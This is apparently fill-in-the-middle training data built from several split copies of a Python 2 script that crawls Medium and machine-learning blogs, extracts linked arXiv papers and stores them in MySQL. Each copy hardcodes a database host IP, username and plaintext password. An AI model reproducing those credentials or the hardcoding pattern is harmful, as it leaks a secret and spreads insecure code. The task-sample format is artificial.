parser.add_argument('-em', '--END_MONTH',
default=str(int(today[1])), help='end month to crawl from')
parser.add_argument('-sd', '--START_DAY',
default=today[2], help='start day to crawl from')
parser.add_argument('-ed', '--END_DAY',
default=str(int(today[2])), help='end day to crawl from')
args = parser.parse_args()
global START_YEAR, END_YEAR, START_MONTH, END_MONTH, START_DAY, END_DAY
START_YEAR = int(args.START_YEAR)
END_YEAR = int(args.END_YEAR)
START_MONTH = int(args.START_MONTH)
END_MONTH = int(args.END_MONTH)
START_DAY = int(args.START_DAY)
END_DAY = int(args.END_DAY)
crawl_medium()
crawl_medium_templates()
crawl_others()
def | ():
tags = []
url_root = 'https://medium.com/tag/'
url_xpath = '//div[@class=\'postArticle-readMore\']/a'
with open('./top_tags_by_blogs_with_linked_papers.json') as f:
content = json.load(f)
# crawl top 100 tags
top_tags = collections.OrderedDict(sorted(content.items(), key=lambda x: x[1], reverse=True)).keys()[:100]
for tag in top_tags:
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + tag + '/archive/' + year_str
if check_redirect(path):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + tag + '/archive/' + year_str + '/' + month_str
if check_redirect(path):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + tag + '/archive/' + year_str + '/' + month_str + '/' + day_str
if check_redirect(path):
continue
crawl_by_day(url_root + tag + '/archive/', url_xpath, year_str, month_str, day_str)
def crawl_medium_templates():
URL_LIST = [
'https://towardsdatascience.com',
'https://hackernoon.com',
'https://becominghuman.ai',
'https://medium.freecodecamp.org',
'https://medium.com/neuromation-io-blog',
'https://blog.slavv.com',
'https://codeburst.io',
'https://ayearofai.com',
'https://machinelearnings.co'
]
url_xpath = '//div[@class=\'postArticle-readMore\']/a'
for url_root in URL_LIST:
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + '/archive/' + year_str
if check_redirect(path):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + '/archive/' + year_str + '/' + month_str
if check_redirect(path):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + '/archive/' + year_str + '/' + month_str + '/' + day_str
if check_redirect(path):
continue
crawl_by_day(url_root + '/archive/', url_xpath, year_str, month_str, day_str)
def crawl_others():
URL_LIST = [
'https://www.r-bloggers.com/',
'https://blog.acolyer.org/',
'http://www.wildml.com/',
'https://mattmazur.com/',
'https://www.kdnuggets.com/',
]
URL_XPATH_MAP = {
'https://www.r-bloggers.com/': '//a[@class=\'more-link\']',
'https://blog.acolyer.org/': '//li/a',
'http://www.wildml.com/': '//a[@class=\'more-link\']',
'https://mattmazur.com/': '//h1[@class=\'entry-title\']/a',
'https://www.kdnuggets.com/': '//li/a',
}
for url_root in URL_LIST:
url_xpath = URL_XPATH_MAP[url_root]
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + year_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + year_str + '/' + month_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + year_str + '/' + month_str + '/' + day_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
crawl_by_day(url_root, url_xpath, year_str, month_str, day_str)
# crawl all the blogs on a given day
def crawl_by_day(url_root, url_xpath, year, month, day):
path = url_root + year + '/' + month + '/' + day
print 'crawl: ' + path
# extract all urls from each day
urls = extract_whole_page_urls(path, url_xpath)
date = year + month + day
print len(urls)
for url in urls:
if '?source=' in url:
url = url[:url.find('?source=')]
data = extract_data_from_url(url)
if 'title' not in data:
continue
data['url'] = url
data['domain'] = url.split('/')[2]
data['date'] = date
# import to blogs, arxivs and blogs_arxivs
import_to_database(data)
def extract_data_from_url(url):
data = {}
goose = Goose()
try:
article = goose.extract(url=url)
except:
return {}
data['title'] = article.title
data['text'] = article.cleaned_text
data['keywords'] = extract_keywords(data['text'].encode('ascii', 'ignore').decode('ascii'))
data['tags'] = []
data['papers'] = []
try:
page_response = requests.get(url, timeout=5, headers=headers)
soup = BeautifulSoup(page_response.content, 'html.parser')
except Exception as e:
print e
return data
# extract tags
tag_links = soup.find_all('a', class_ = 'link u-baseColor--link')
for link in tag_links:
try:
link = link['href']
except Exception as e:
continue
if not 'tag' in link:
continue
try:
tag = link.split('/')[4]
tag = tag[:tag.find('?')]
data['tags'].append(tag)
except:
continue
# extract linked papers
paper_links = soup.find_all('a')
for link in paper_links:
try:
link = link['href']
except:
continue
if link.startswith('/'):
baseurl = url.split('/')[0] + url.split('/')[1] + url.split('/')[2]
link = baseurl + link
# check if is arxiv paper link
if 'arxiv.org' in link:
data['papers'].append(link)
return data
def import_to_database(data):
blog_url = data['url']
blog_id = hashlib.md5(blog_url.encode()).hexdigest()
sql = "INSERT INTO blogs (id, url, date, domain, title, text, tags, keywords) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)"
val = [blog_id, data['url'], data['date'], data['domain'], data['title'], data['text'], str(data['tags']), str(data['keywords'])]
try:
mycursor.execute(sql, tuple(val))
mydb.commit()
if mycursor.rowcount > 0:
print str(mycursor.rowcount) + " blog inserted."
except Exception as e:
if not str(e).startswith('1062'):
print e
# import to arxivs and blogs_arxivs
for paper in data['papers']:
url = paper
try:
paper = paper[paper.find('arxiv.org') + 10:]
if paper.startswith('ftp'):
arxiv_id = paper.split('/')[4]
else:
arxiv_id = paper.split('/')[1]
if '.pdf' in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find('.pdf')]
symbols = ['?', '%', '&', '#']
for symbol in symbols:
if symbol in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find(symbol)]
if arxiv_id.endswith('.'):
arxiv_id = arxiv_id[:len(arxiv_id) - 1]
try:
query = arxiv.query(id_list=[arxiv_id])[0]
except Exception as e:
print e
arxiv_id = paper.split('/')[1] + '/' + paper.split('/')[2]
if '.pdf' in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find('.pdf')]
# print arxiv_id
query = arxiv.query(id_list=[arxiv_id])[0]
published = query.published
date = published[:4] + published[5:7] + published[8:10]
title = query.title
summary = query.summary
tags = str(query.tags)
keywords = str(extract_keywords(summary))
val = [arxiv_id, url, date, title, summary, tags, keywords]
sql = "INSERT INTO arxivs (id, url, date, title, summary, tags, keywords) VALUES (%s, %s, %s, %s, %s, %s, %s)"
try:
mycursor.execute(sql, tuple(val))
mydb.commit()
print str(mycursor.rowcount) + " arxiv inserted."
except Exception as e:
if not str(e).startswith('1062'):
print e
match_id = '#'.join([blog_id, arxiv_id])
val = [match_id, blog_id, arxiv_id]
sql = "INSERT INTO blogs_arxivs (match_id, blog_id, arxiv_id) VALUES (%s, %s, %s)"
mycursor.execute(sql, tuple(val))
mydb.commit()
print str(mycursor.rowcount) + " blogs_arxivs inserted."
except Exception as e:
if not str(e).startswith('1062'):
print 'error1 '+ str(e)
print url
continue
# crawl all the blog links given a page link
def extract_whole_page_urls(url, xpath):
while True:
try:
driver = webdriver.Chrome(chrome_options=chrome_options)
break
except Exception as e:
print e
print 'restart'
pass
try:
driver.get(url)
except:
print 'fail to get page link'
driver.quit()
return []
SCROLL_PAUSE_TIME = 4
# Get scroll height
last_height = driver.execute_script("return document.body.scrollHeight")
while True:
# Scroll down to bottom
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
# Wait to load page
time.sleep(SCROLL_PAUSE_TIME)
# Calculate new scroll height and compare with last scroll height
new_height = driver.execute_script("return document.body.scrollHeight")
if new_height == last_height:
break
last_height = new_height
divs = driver.find_elements_by_xpath(xpath)
urls = []
for div in divs:
try:
url = div.get_attribute('href')
except:
continue
if url == None or len(url) == 0:
continue
urls.append(url)
driver.quit()
return urls
def extract_keywords(text):
r = Rake() # Uses stopwords for english from NLTK, and all puntuation characters.
r.extract_keywords_from_text(text)
return r.get_ranked_phrases() # To get keyword phrases ranked highest to lowest.
# convert interger year/month/day to string
def convert_number_to_str(number):
if number < 10:
string = '0' + str(number)
else:
string = str(number)
return string
# check if there is redirect
def check_redirect(url):
r = requests.get(url)
if r.status_code == 404:
return True
if len(r.history) == 0 or len(r.history) == 2:
return False
else:
print 'redirect: ' + url
return True
main()
| crawl_medium | identifier_name |
integration.py | from argparse import ArgumentParser
from datetime import date
from goose import Goose
import collections
import mysql.connector
import hashlib
import arxiv
import requests
import time
import json
from goose import Goose
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium import webdriver
from selenium.webdriver.support.ui import Select
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from bs4 import BeautifulSoup
from rake_nltk import Rake
mydb = mysql.connector.connect(
host="128.111.54.55",
user="muxu",
passwd="8054552162",
database="moon_master_project",
charset='utf8mb4'
)
mycursor = mydb.cursor()
headers = requests.utils.default_headers()
headers.update({
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
})
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.add_argument('--disable-extensions')
chrome_options.add_argument('--disable-gpu')
chrome_options.add_argument('--no-sandbox')
prefs = {'profile.managed_default_content_settings.images':2}
chrome_options.add_experimental_option("prefs", prefs)
def main():
parser = ArgumentParser()
#default is crawl daily blogs
today = str(date.today()).split('-')
parser.add_argument('-sy', '--START_YEAR',
default=today[0], help='start year to crawl from')
parser.add_argument('-ey', '--END_YEAR',
default=str(int(today[0])), help='end year to crawl from')
parser.add_argument('-sm', '--START_MONTH',
default=today[1], help='start month to crawl from')
parser.add_argument('-em', '--END_MONTH',
default=str(int(today[1])), help='end month to crawl from')
parser.add_argument('-sd', '--START_DAY',
default=today[2], help='start day to crawl from')
parser.add_argument('-ed', '--END_DAY',
default=str(int(today[2])), help='end day to crawl from')
args = parser.parse_args()
global START_YEAR, END_YEAR, START_MONTH, END_MONTH, START_DAY, END_DAY
START_YEAR = int(args.START_YEAR)
END_YEAR = int(args.END_YEAR)
START_MONTH = int(args.START_MONTH)
END_MONTH = int(args.END_MONTH)
START_DAY = int(args.START_DAY)
END_DAY = int(args.END_DAY)
crawl_medium()
crawl_medium_templates()
crawl_others()
def crawl_medium():
tags = []
url_root = 'https://medium.com/tag/'
url_xpath = '//div[@class=\'postArticle-readMore\']/a'
with open('./top_tags_by_blogs_with_linked_papers.json') as f:
content = json.load(f)
# crawl top 100 tags
top_tags = collections.OrderedDict(sorted(content.items(), key=lambda x: x[1], reverse=True)).keys()[:100]
for tag in top_tags:
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + tag + '/archive/' + year_str
if check_redirect(path):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + tag + '/archive/' + year_str + '/' + month_str
if check_redirect(path):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + tag + '/archive/' + year_str + '/' + month_str + '/' + day_str
if check_redirect(path):
continue
crawl_by_day(url_root + tag + '/archive/', url_xpath, year_str, month_str, day_str)
def crawl_medium_templates():
URL_LIST = [
'https://towardsdatascience.com',
'https://hackernoon.com',
'https://becominghuman.ai',
'https://medium.freecodecamp.org',
'https://medium.com/neuromation-io-blog',
'https://blog.slavv.com',
'https://codeburst.io',
'https://ayearofai.com',
'https://machinelearnings.co'
]
url_xpath = '//div[@class=\'postArticle-readMore\']/a'
for url_root in URL_LIST:
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + '/archive/' + year_str
if check_redirect(path):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + '/archive/' + year_str + '/' + month_str
if check_redirect(path):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + '/archive/' + year_str + '/' + month_str + '/' + day_str
if check_redirect(path):
continue
crawl_by_day(url_root + '/archive/', url_xpath, year_str, month_str, day_str)
def crawl_others():
URL_LIST = [
'https://www.r-bloggers.com/',
'https://blog.acolyer.org/',
'http://www.wildml.com/',
'https://mattmazur.com/',
'https://www.kdnuggets.com/',
]
URL_XPATH_MAP = {
'https://www.r-bloggers.com/': '//a[@class=\'more-link\']',
'https://blog.acolyer.org/': '//li/a',
'http://www.wildml.com/': '//a[@class=\'more-link\']',
'https://mattmazur.com/': '//h1[@class=\'entry-title\']/a',
'https://www.kdnuggets.com/': '//li/a',
}
for url_root in URL_LIST:
url_xpath = URL_XPATH_MAP[url_root]
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + year_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + year_str + '/' + month_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + year_str + '/' + month_str + '/' + day_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
crawl_by_day(url_root, url_xpath, year_str, month_str, day_str)
# crawl all the blogs on a given day
def crawl_by_day(url_root, url_xpath, year, month, day):
path = url_root + year + '/' + month + '/' + day
print 'crawl: ' + path
# extract all urls from each day
urls = extract_whole_page_urls(path, url_xpath)
date = year + month + day
print len(urls)
for url in urls:
if '?source=' in url:
url = url[:url.find('?source=')]
data = extract_data_from_url(url)
if 'title' not in data:
continue
data['url'] = url
data['domain'] = url.split('/')[2]
data['date'] = date
# import to blogs, arxivs and blogs_arxivs
import_to_database(data)
def extract_data_from_url(url):
data = {}
goose = Goose()
try:
article = goose.extract(url=url)
except:
return {}
data['title'] = article.title
data['text'] = article.cleaned_text
data['keywords'] = extract_keywords(data['text'].encode('ascii', 'ignore').decode('ascii'))
data['tags'] = []
data['papers'] = []
try:
page_response = requests.get(url, timeout=5, headers=headers)
soup = BeautifulSoup(page_response.content, 'html.parser')
except Exception as e:
print e
return data
# extract tags
tag_links = soup.find_all('a', class_ = 'link u-baseColor--link')
for link in tag_links:
try:
link = link['href']
except Exception as e:
continue
if not 'tag' in link:
continue
try:
tag = link.split('/')[4]
tag = tag[:tag.find('?')]
data['tags'].append(tag)
except:
continue
# extract linked papers
paper_links = soup.find_all('a')
for link in paper_links:
try:
link = link['href']
except:
continue
if link.startswith('/'):
baseurl = url.split('/')[0] + url.split('/')[1] + url.split('/')[2]
link = baseurl + link
# check if is arxiv paper link
if 'arxiv.org' in link:
data['papers'].append(link)
return data
def import_to_database(data):
blog_url = data['url']
blog_id = hashlib.md5(blog_url.encode()).hexdigest()
sql = "INSERT INTO blogs (id, url, date, domain, title, text, tags, keywords) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)"
val = [blog_id, data['url'], data['date'], data['domain'], data['title'], data['text'], str(data['tags']), str(data['keywords'])]
try:
mycursor.execute(sql, tuple(val))
mydb.commit()
if mycursor.rowcount > 0:
print str(mycursor.rowcount) + " blog inserted."
except Exception as e:
if not str(e).startswith('1062'):
print e
# import to arxivs and blogs_arxivs
for paper in data['papers']:
url = paper
try:
paper = paper[paper.find('arxiv.org') + 10:]
if paper.startswith('ftp'):
arxiv_id = paper.split('/')[4]
else:
arxiv_id = paper.split('/')[1]
if '.pdf' in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find('.pdf')]
symbols = ['?', '%', '&', '#']
for symbol in symbols:
if symbol in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find(symbol)]
if arxiv_id.endswith('.'):
arxiv_id = arxiv_id[:len(arxiv_id) - 1]
try:
query = arxiv.query(id_list=[arxiv_id])[0]
except Exception as e:
print e
arxiv_id = paper.split('/')[1] + '/' + paper.split('/')[2]
if '.pdf' in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find('.pdf')]
# print arxiv_id
query = arxiv.query(id_list=[arxiv_id])[0]
published = query.published
date = published[:4] + published[5:7] + published[8:10]
title = query.title
summary = query.summary
tags = str(query.tags)
keywords = str(extract_keywords(summary))
val = [arxiv_id, url, date, title, summary, tags, keywords]
sql = "INSERT INTO arxivs (id, url, date, title, summary, tags, keywords) VALUES (%s, %s, %s, %s, %s, %s, %s)"
try:
mycursor.execute(sql, tuple(val))
mydb.commit()
print str(mycursor.rowcount) + " arxiv inserted."
except Exception as e:
if not str(e).startswith('1062'):
print e
match_id = '#'.join([blog_id, arxiv_id])
val = [match_id, blog_id, arxiv_id]
sql = "INSERT INTO blogs_arxivs (match_id, blog_id, arxiv_id) VALUES (%s, %s, %s)"
mycursor.execute(sql, tuple(val))
mydb.commit()
print str(mycursor.rowcount) + " blogs_arxivs inserted."
except Exception as e:
if not str(e).startswith('1062'):
print 'error1 '+ str(e)
print url
continue
# crawl all the blog links given a page link
def extract_whole_page_urls(url, xpath):
while True:
try:
driver = webdriver.Chrome(chrome_options=chrome_options)
break
except Exception as e:
print e
print 'restart'
pass
try:
driver.get(url)
except:
print 'fail to get page link'
driver.quit()
return []
SCROLL_PAUSE_TIME = 4
# Get scroll height
last_height = driver.execute_script("return document.body.scrollHeight")
while True:
# Scroll down to bottom
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
# Wait to load page
time.sleep(SCROLL_PAUSE_TIME)
# Calculate new scroll height and compare with last scroll height
new_height = driver.execute_script("return document.body.scrollHeight")
if new_height == last_height:
break
last_height = new_height
divs = driver.find_elements_by_xpath(xpath)
urls = []
for div in divs:
try:
url = div.get_attribute('href')
except:
continue
if url == None or len(url) == 0:
continue
urls.append(url)
driver.quit()
return urls
def extract_keywords(text):
|
# convert interger year/month/day to string
def convert_number_to_str(number):
if number < 10:
string = '0' + str(number)
else:
string = str(number)
return string
# check if there is redirect
def check_redirect(url):
r = requests.get(url)
if r.status_code == 404:
return True
if len(r.history) == 0 or len(r.history) == 2:
return False
else:
print 'redirect: ' + url
return True
main()
| r = Rake() # Uses stopwords for english from NLTK, and all puntuation characters.
r.extract_keywords_from_text(text)
return r.get_ranked_phrases() # To get keyword phrases ranked highest to lowest. | identifier_body |
integration.py | from argparse import ArgumentParser
from datetime import date
from goose import Goose
import collections
import mysql.connector
import hashlib
import arxiv
import requests
import time
import json
from goose import Goose
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium import webdriver
from selenium.webdriver.support.ui import Select
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from bs4 import BeautifulSoup
from rake_nltk import Rake
mydb = mysql.connector.connect(
host="128.111.54.55",
user="muxu",
passwd="8054552162",
database="moon_master_project",
charset='utf8mb4'
)
mycursor = mydb.cursor()
headers = requests.utils.default_headers()
headers.update({
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
})
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.add_argument('--disable-extensions')
chrome_options.add_argument('--disable-gpu')
chrome_options.add_argument('--no-sandbox')
prefs = {'profile.managed_default_content_settings.images':2}
chrome_options.add_experimental_option("prefs", prefs)
def main():
parser = ArgumentParser()
#default is crawl daily blogs
today = str(date.today()).split('-')
parser.add_argument('-sy', '--START_YEAR',
default=today[0], help='start year to crawl from')
parser.add_argument('-ey', '--END_YEAR',
default=str(int(today[0])), help='end year to crawl from')
parser.add_argument('-sm', '--START_MONTH',
default=today[1], help='start month to crawl from')
parser.add_argument('-em', '--END_MONTH',
default=str(int(today[1])), help='end month to crawl from')
parser.add_argument('-sd', '--START_DAY',
default=today[2], help='start day to crawl from')
parser.add_argument('-ed', '--END_DAY',
default=str(int(today[2])), help='end day to crawl from')
args = parser.parse_args()
global START_YEAR, END_YEAR, START_MONTH, END_MONTH, START_DAY, END_DAY
START_YEAR = int(args.START_YEAR)
END_YEAR = int(args.END_YEAR)
START_MONTH = int(args.START_MONTH)
END_MONTH = int(args.END_MONTH)
START_DAY = int(args.START_DAY)
END_DAY = int(args.END_DAY)
crawl_medium()
crawl_medium_templates()
crawl_others()
def crawl_medium():
tags = []
url_root = 'https://medium.com/tag/'
url_xpath = '//div[@class=\'postArticle-readMore\']/a'
with open('./top_tags_by_blogs_with_linked_papers.json') as f:
content = json.load(f)
# crawl top 100 tags
top_tags = collections.OrderedDict(sorted(content.items(), key=lambda x: x[1], reverse=True)).keys()[:100]
for tag in top_tags:
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + tag + '/archive/' + year_str
if check_redirect(path):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + tag + '/archive/' + year_str + '/' + month_str
if check_redirect(path):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + tag + '/archive/' + year_str + '/' + month_str + '/' + day_str
if check_redirect(path):
continue
crawl_by_day(url_root + tag + '/archive/', url_xpath, year_str, month_str, day_str)
def crawl_medium_templates():
URL_LIST = [
'https://towardsdatascience.com',
'https://hackernoon.com',
'https://becominghuman.ai',
'https://medium.freecodecamp.org',
'https://medium.com/neuromation-io-blog',
'https://blog.slavv.com',
'https://codeburst.io',
'https://ayearofai.com',
'https://machinelearnings.co'
]
url_xpath = '//div[@class=\'postArticle-readMore\']/a'
for url_root in URL_LIST:
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + '/archive/' + year_str
if check_redirect(path):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + '/archive/' + year_str + '/' + month_str
if check_redirect(path):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + '/archive/' + year_str + '/' + month_str + '/' + day_str
if check_redirect(path):
continue
crawl_by_day(url_root + '/archive/', url_xpath, year_str, month_str, day_str)
def crawl_others():
URL_LIST = [
'https://www.r-bloggers.com/',
'https://blog.acolyer.org/',
'http://www.wildml.com/',
'https://mattmazur.com/',
'https://www.kdnuggets.com/',
]
URL_XPATH_MAP = {
'https://www.r-bloggers.com/': '//a[@class=\'more-link\']',
'https://blog.acolyer.org/': '//li/a',
'http://www.wildml.com/': '//a[@class=\'more-link\']',
'https://mattmazur.com/': '//h1[@class=\'entry-title\']/a',
'https://www.kdnuggets.com/': '//li/a',
}
for url_root in URL_LIST:
url_xpath = URL_XPATH_MAP[url_root]
for year in range(START_YEAR, END_YEAR + 1):
year_str = convert_number_to_str(year)
path = url_root + year_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
for month in range(START_MONTH, END_MONTH + 1):
month_str = convert_number_to_str(month)
path = url_root + year_str + '/' + month_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
for day in range(START_DAY, END_DAY + 1):
day_str = convert_number_to_str(day)
# check if the day exists
path = url_root + year_str + '/' + month_str + '/' + day_str + '/'
if check_redirect(path) and check_redirect(path.strip('/')):
continue
crawl_by_day(url_root, url_xpath, year_str, month_str, day_str)
# crawl all the blogs on a given day
def crawl_by_day(url_root, url_xpath, year, month, day):
path = url_root + year + '/' + month + '/' + day
print 'crawl: ' + path
# extract all urls from each day
urls = extract_whole_page_urls(path, url_xpath)
date = year + month + day
print len(urls)
for url in urls:
if '?source=' in url:
url = url[:url.find('?source=')]
data = extract_data_from_url(url)
if 'title' not in data:
continue
data['url'] = url
data['domain'] = url.split('/')[2]
data['date'] = date
# import to blogs, arxivs and blogs_arxivs
import_to_database(data)
def extract_data_from_url(url):
data = {}
goose = Goose()
try:
article = goose.extract(url=url)
except:
return {}
data['title'] = article.title
data['text'] = article.cleaned_text
data['keywords'] = extract_keywords(data['text'].encode('ascii', 'ignore').decode('ascii'))
data['tags'] = []
data['papers'] = []
try:
page_response = requests.get(url, timeout=5, headers=headers)
soup = BeautifulSoup(page_response.content, 'html.parser')
except Exception as e:
print e
return data
# extract tags
tag_links = soup.find_all('a', class_ = 'link u-baseColor--link')
for link in tag_links:
try:
link = link['href']
except Exception as e:
continue
if not 'tag' in link:
continue
try:
tag = link.split('/')[4]
tag = tag[:tag.find('?')]
data['tags'].append(tag)
except:
continue
# extract linked papers
paper_links = soup.find_all('a')
for link in paper_links:
try:
link = link['href']
except:
continue
if link.startswith('/'):
baseurl = url.split('/')[0] + url.split('/')[1] + url.split('/')[2]
link = baseurl + link
# check if is arxiv paper link
if 'arxiv.org' in link:
data['papers'].append(link)
return data
def import_to_database(data):
blog_url = data['url']
blog_id = hashlib.md5(blog_url.encode()).hexdigest()
sql = "INSERT INTO blogs (id, url, date, domain, title, text, tags, keywords) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)"
val = [blog_id, data['url'], data['date'], data['domain'], data['title'], data['text'], str(data['tags']), str(data['keywords'])]
try:
mycursor.execute(sql, tuple(val))
mydb.commit()
if mycursor.rowcount > 0:
print str(mycursor.rowcount) + " blog inserted."
except Exception as e:
if not str(e).startswith('1062'):
print e
# import to arxivs and blogs_arxivs
for paper in data['papers']:
url = paper
try:
paper = paper[paper.find('arxiv.org') + 10:]
if paper.startswith('ftp'):
arxiv_id = paper.split('/')[4]
else:
arxiv_id = paper.split('/')[1]
if '.pdf' in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find('.pdf')]
symbols = ['?', '%', '&', '#']
for symbol in symbols:
if symbol in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find(symbol)]
if arxiv_id.endswith('.'):
|
try:
query = arxiv.query(id_list=[arxiv_id])[0]
except Exception as e:
print e
arxiv_id = paper.split('/')[1] + '/' + paper.split('/')[2]
if '.pdf' in arxiv_id:
arxiv_id = arxiv_id[:arxiv_id.find('.pdf')]
# print arxiv_id
query = arxiv.query(id_list=[arxiv_id])[0]
published = query.published
date = published[:4] + published[5:7] + published[8:10]
title = query.title
summary = query.summary
tags = str(query.tags)
keywords = str(extract_keywords(summary))
val = [arxiv_id, url, date, title, summary, tags, keywords]
sql = "INSERT INTO arxivs (id, url, date, title, summary, tags, keywords) VALUES (%s, %s, %s, %s, %s, %s, %s)"
try:
mycursor.execute(sql, tuple(val))
mydb.commit()
print str(mycursor.rowcount) + " arxiv inserted."
except Exception as e:
if not str(e).startswith('1062'):
print e
match_id = '#'.join([blog_id, arxiv_id])
val = [match_id, blog_id, arxiv_id]
sql = "INSERT INTO blogs_arxivs (match_id, blog_id, arxiv_id) VALUES (%s, %s, %s)"
mycursor.execute(sql, tuple(val))
mydb.commit()
print str(mycursor.rowcount) + " blogs_arxivs inserted."
except Exception as e:
if not str(e).startswith('1062'):
print 'error1 '+ str(e)
print url
continue
# crawl all the blog links given a page link
def extract_whole_page_urls(url, xpath):
while True:
try:
driver = webdriver.Chrome(chrome_options=chrome_options)
break
except Exception as e:
print e
print 'restart'
pass
try:
driver.get(url)
except:
print 'fail to get page link'
driver.quit()
return []
SCROLL_PAUSE_TIME = 4
# Get scroll height
last_height = driver.execute_script("return document.body.scrollHeight")
while True:
# Scroll down to bottom
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
# Wait to load page
time.sleep(SCROLL_PAUSE_TIME)
# Calculate new scroll height and compare with last scroll height
new_height = driver.execute_script("return document.body.scrollHeight")
if new_height == last_height:
break
last_height = new_height
divs = driver.find_elements_by_xpath(xpath)
urls = []
for div in divs:
try:
url = div.get_attribute('href')
except:
continue
if url == None or len(url) == 0:
continue
urls.append(url)
driver.quit()
return urls
def extract_keywords(text):
r = Rake() # Uses stopwords for english from NLTK, and all puntuation characters.
r.extract_keywords_from_text(text)
return r.get_ranked_phrases() # To get keyword phrases ranked highest to lowest.
# convert interger year/month/day to string
def convert_number_to_str(number):
if number < 10:
string = '0' + str(number)
else:
string = str(number)
return string
# check if there is redirect
def check_redirect(url):
r = requests.get(url)
if r.status_code == 404:
return True
if len(r.history) == 0 or len(r.history) == 2:
return False
else:
print 'redirect: ' + url
return True
main()
| arxiv_id = arxiv_id[:len(arxiv_id) - 1] | conditional_block |
integration.py | from argparse import ArgumentParser
from datetime import date
from goose import Goose
import collections
import mysql.connector
import hashlib
import arxiv
import requests
import time
import json
from goose import Goose
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium import webdriver
from selenium.webdriver.support.ui import Select
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from bs4 import BeautifulSoup
from rake_nltk import Rake
mydb = mysql.connector.connect(
host="128.111.54.55",
user="muxu",
passwd="8054552162",
database="moon_master_project",
charset='utf8mb4'
)
mycursor = mydb.cursor()
headers = requests.utils.default_headers()
headers.update({
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
})
chrome_options = Options() | prefs = {'profile.managed_default_content_settings.images':2}
chrome_options.add_experimental_option("prefs", prefs)
def main():
parser = ArgumentParser()
#default is crawl daily blogs
today = str(date.today()).split('-')
parser.add_argument('-sy', '--START_YEAR',
default=today[0], help='start year to crawl from')
parser.add_argument('-ey', '--END_YEAR',
default=str(int(today[0])), help='end year to crawl from')
parser.add_argument('-sm', '--START_MONTH',
default=today[1], help='start month to crawl from')
parser.add_argument('-em', '--END_MONTH',
default=str(int(today[1])), help='end month to crawl from')
parser.add_argument('-sd', '--START_DAY',
